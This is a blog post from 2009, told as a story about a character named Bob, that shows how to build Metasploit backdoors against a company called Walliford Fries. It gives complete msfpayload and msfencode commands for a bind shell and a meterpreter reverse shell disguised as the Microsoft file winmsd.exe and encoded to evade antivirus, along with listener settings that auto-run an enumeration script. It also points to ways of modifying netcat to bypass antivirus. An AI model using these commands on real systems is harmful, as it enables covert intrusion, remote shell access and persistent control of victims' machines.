Previously in Bob Land......
Bob hears on the grapevine that ncat won't work as a single executable. This is a bit of a bugger and it does give Bob a problem. His intention was to use ncat for file transfers, proxies and backdoors. It was also pretty useful that it was pretty much undetected by AV.
Luckily for Bob he hears from a good friend that it's quite possible to modify netcat to be able to bypass anti-virus software. And luckily for Bob, the most talented Muts has created a video that shows him exactly how to do that here.
This problem also presents Bob with the perfect opportunity to get his hands dirty with some msfpayload love. He reckons that if he creates a couple of payloads to add into his cab file he should be able to do everything he needs. And the beauty of using msfpayload is he'll be able to run them through msfencode to bypass most anti-virus.
Before Bob creates his payloads he grabs a copy of winmsd.exe from his Windows OS. It doesn't really matter to him what file it is he just wants one that is a Microsoft file. He want this because all his payloads can take on the characteristics of the file. Rather than going to great lengths to hide a file, Bobs opinion is that hiding in plain site will probably be better.
For Bobs first payload he wants to create a generic payload that will spawn a command shell when he connects to it on port 6666.
./msfpayload windows/shell_bind_tcp LPORT=6666 R | ./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd16.exe
Bob has specified a payload that will bind a shell to port 6666. He outputs this in raw format to the msfencode program that will help avoid detection by anti-virus software. Finally he has specified that the file is called winmsd16.exe and upon physical inspection it will look just like the original winmsd.exe file.
After Bob creates the file he tests it out on his XP VM to make sure it works as expected.
Side by side it looks just like the original file, it is identical in size and looks just as through its a legitimate file from Microsoft.
Bob runs the file and checks he can connect to it with netcat.
nc 10.0.1.10 6666
Bobs second payload will connect back to him when he's on the wireless network and present him with a meterpreter shell.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=8080 R | ./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd32.exe
Again Bob uses a legitimate file to copy the characteristics from. This time on his host he has to make sure he has his listener ready on port 8080.
Bob decides that when he creates his listener he'll use msfconsole and pass the following commands:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z
Bob has configured his listener to accept multiple sessions coming back to him, and the very useful winenum script developed by Carlos "Dark operator" Perez will run against each connecting host. All the information from the script will be stored in ~/.msf/logs/ Bob may well decide to change this at a later date to another script but for now he's very happy.
With his modified netcat and his payloads created and tested Bob rebuilds his cab file and goes to get his dinner. He knows that during his network exploration adventures he may well come up against some problems that will cause him to create some payloads on the fly but he'll deal with that when it happens.
Whilst eating his dinner Bob begins to worry that if the Admins at Walliford Fries patch the computers he may well lose his way in. By the time Bob has eaten his ice cream desert he has come up with a few ideas how he might overcome this particular problem.
Coming next....Backdoor Man - Part 2.
Tuesday, November 17, 2009
Previously in Bob Land......